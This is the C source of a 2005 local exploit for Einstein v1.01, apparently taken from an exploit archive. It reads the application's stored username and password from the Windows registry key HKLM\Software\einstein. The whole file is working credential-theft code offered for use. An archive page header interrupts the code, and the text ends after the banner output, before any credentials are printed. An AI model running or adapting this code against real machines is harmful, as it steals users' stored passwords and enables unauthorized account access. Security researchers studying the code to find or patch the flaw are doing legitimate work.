1 /*******************************************************************
2
3 Einstein v1.01 Local Password Disclosure Exploit by Kozan
4
5 Application: Einstein v1.01 (and previous versions)
6 Procuder: Bfriendly.com
7 Vulnerable Description: Einstein v1.01 discloses passwords
8 to local users.
9
10 Discovered & Coded by: Kozan
11 Credits to ATmaCA
12 Web: www.netmagister.com
13 Web2: www.spyinstructors.com
14 Mail: kozan@netmagister.com
15
16 *******************************************************************/
17
18 #include <stdio.h>
19 #include <windows.h>
20
21 HKEY hKey;
22
23 #define BUFSIZE 100
24 char username[BUFSIZE], password[BUFSIZE];
25 DWORD dwBufLen=BUFSIZE;
26 LONG lRet;
27
28 int main(void)
29 {
30
31 if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\einstein",
32 0,
33 KEY_QUERY_VALUE,
34 &hKey) == ERROR_SUCCESS)
35 {
36
37 lRet = RegQueryValueEx( hKey, "username", NULL, NULL,
38 (LPBYTE) username, &dwBufLen);
39
40 if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) ){
41 RegCloseKey(hKey);
42 printf("En error occured!");
43 return 0;
44 }
45
46 lRet = RegQueryValueEx( hKey, "password", NULL, NULL,
47 (LPBYTE) password, &dwBufLen);
48
49 if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) ){
50 RegCloseKey(hKey);
51 printf("En error occured!");
52 return 0;
Page 1/2
Einstein 1.01 Local Password Disclosure Exploit
Kozan
02/27/2005
53 }
54 RegCloseKey( hKey );
55
56 printf("Einstein v1.01 Local Exploit by Kozan\n");
57 printf("Credits to ATmaCA\n");
58